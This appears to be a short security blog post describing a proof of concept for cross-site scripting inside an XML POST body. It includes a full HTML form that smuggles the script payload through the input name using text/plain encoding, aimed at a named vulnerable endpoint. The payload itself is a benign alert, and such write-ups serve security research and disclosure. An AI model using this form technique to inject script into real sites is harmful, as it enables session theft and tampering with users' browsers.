POST /snip/snippet.php HTTP/1.1
<?xml version="1.0"?> I tested in BURP for XSS in XML, and it worked. Now I have to get this to work via a browser. I was a bit stuck of sending XML in a HTML form POST and google didn’t yeild me any results, but I worked out how. Below is my PoC:
<html> <body> <form ENCTYPE="text/plain" action="http://vulnsite.com/snip/snippet.php" method="post"> <input type="hidden" name="<foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>alert(1);</html:script> </html> </foo>"> <input type="submit" value="submit"> </form> Upon pressing “Submit”, the XSS in the XML is sent, and executes. And there we have it.. XSS in a XML post via a HTML form. Turns out adding the input name as the XSS will allow it to be executed.
Note: Turns out all endpoints on the target site are vulnerable to this.. they’re going to have fun patching this. ;)